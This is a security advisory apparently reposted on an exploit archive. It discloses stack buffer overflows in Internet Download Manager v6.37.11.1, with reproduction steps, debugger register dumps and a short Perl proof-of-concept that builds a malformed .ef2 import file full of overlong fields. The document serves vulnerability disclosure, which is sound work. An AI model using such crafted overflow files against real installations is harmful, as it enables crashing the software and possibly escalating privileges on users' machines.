exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Internet Download Manager Buffer Overflow

Internet Download Manager Buffer Overflow
Posted Apr 28, 2020
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Internet Download Manager version suffers from multiple stack buffer overflow vulnerabilities.

tags | exploit, overflow, vulnerability
SHA-256 | bf2fbd139c8279731a36484b54ed8b9dfec5b99d1a3463612d1cff48e2e54c22

Internet Download Manager Buffer Overflow

Change Mirror Download
Document Title:
Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities

References (Source):

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Vulnerability Class:
Buffer Overflow

Current Estimated Price:
1.000€ - 2.000€

Product & Service Introduction:
Internet Download Manager Corp. is a subsidiary of Tonec Inc. that
develops Internet Applications since 1990.
We have strong expertise in network programming, consulting and design
services. Our company started Internet
Download Manager project in 1998 when we where developing network
libraries and console applications for
accelerated files downloading.

(Copy of the Homepage:
https://www.internetdownloadmanager.com/support/about_us.html )
(Sofwtare Product: https://www.internetdownloadmanager.com/download.html)

Abstract Advisory Information:
The vulnerability laboratory core research team discovered a stack
buffer overflow vulnerabilities in the Internet Download Manager
v6.37.11.1 software.

Vulnerability Disclosure Timeline:
2020-04-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Exploitation Technique:

Severity Level:

Authentication Type:
Restricted authentication (user/moderator) - User privileges

User Interaction:
No User Interaction

Disclosure Type:
Independent Security Research

Technical Details & Description:
Multiple stack buffer overflow vulnerabilities has been discovered in
the official Internet Download Manager v6.37.11.1 software.
The bufer overflow allows to overwrite registers of the process to
compromise the file-system by elevates local process privileges.

The first stack buffer overflows is located in the `search` function of
the downloads menu. The search function itself does not use
any secure restriction in the requested search variable of the inputs.
Local attackers with access to the software are able to overflow
the registers to elevate local process privileges. Thus allows a local
attacker to compromise the local computer- or file-system.

The second stack buffer overflows is located in the `Export/Import`
function of the tasks menu. Local users are able to import and
export the download tasks as *.ef2 file. Local attackers are able to
import manipulated *.ef2 files with manipulated referer and
source url to overwrite the eip register. The issue occurs because of
the insufficient ef2 filetype (context) validation process
that does not perform any length restrictions.

The security risk of the local stack buffer overflow vulnerabilities in
the software are estimated as high with a cvss count of 7.1.
Exploitation of the buffer overflow vulnerability requires a low
privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in overwrite of the
active registers to compromise of the computer system or process.

Vulnerable Module(s):
[+] Search
[+] Import/Export (ef2)

Proof of Concept (PoC):
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the software
2. Click the downloads menu and open the search
3. Inject a large unicode payload inside the search input field and transmit
4. The software crashs with several uncaught exception because of
overwritten register (0168D8F0)
5. Successful reproduce of the local buffer overflow vulnerability!

--- Debug Logs (0168D8F0) ---
00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141
00D6186D |. 56 PUSH ESI ; /Arg1
00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ;
00D6189B |> 50 PUSH EAX ; /Arg1
00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ;
Call stack
Procedure / arguments=IDMan.00D617E0
Called from=IDMan.00DFE0ED
SEH chain
Address SE handler
0168C790 IDMan.00F751E8
0168D8F0 41414141
EAX 41414141
ECX 01680000
EDX 41414141
EBX 00000001
ESP 0168C76C
EDI 00410043
EIP 00D61850 IDMan.00D61850
Executable modules
Size=00539000 (5476352.)
Entry=00F5CB1C IDMan.<ModuleEntryPoint>
File version=6, 37, 11, 2
Path=C:Program Files (x86)Internet Download ManagerIDMan.exe

The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the software
2. Start the bof_poc.pl
3. Open the tasks menu
4. Click import and import *.ef2 poc
Note: The software process crashs on import with uncaught exception
5. Successful reproduce of the local buffer overflow vulnerability!

Usage Example: Export/Import (*.ef2)
referer: https://www.vulnerability-lab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

PoC: Exploit
# Local Stack Buffer Overflow Exploit for Internet Download Manager
# Vulnerability Laboratory - Benjamin Kunz Mejri
my $poc = "bof_poc.ef2" ;
print "[+] Producing bof_poc.ef2 ..." ;
my $buff0=" "."<" x 1;
my $buff1=" n https://"."A" x 1024;
my $buff2=" n Referer:"."A" x 1024;
my $buff3=" n User Agent:"."A" x 1024;
my $buff4=" n ".">" x 1;
open(ef2, ">>$poc") or die "Cannot open $poc";
print ef2 $buff0;
print ef2 $buff1;
print ef2 $buff2;
print ef2 $buff3;
print ef2 $buff4;
print "n[+] done !";

Credits & Authors:
Vulnerability-Lab -
Benjamin Kunz Mejri -

Disclaimer & Information:
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
Feeds: vulnerability-lab.com/rss/rss.php
Programs: vulnerability-lab.com/submit.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™

SERVICE: www.vulnerability-lab.com
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By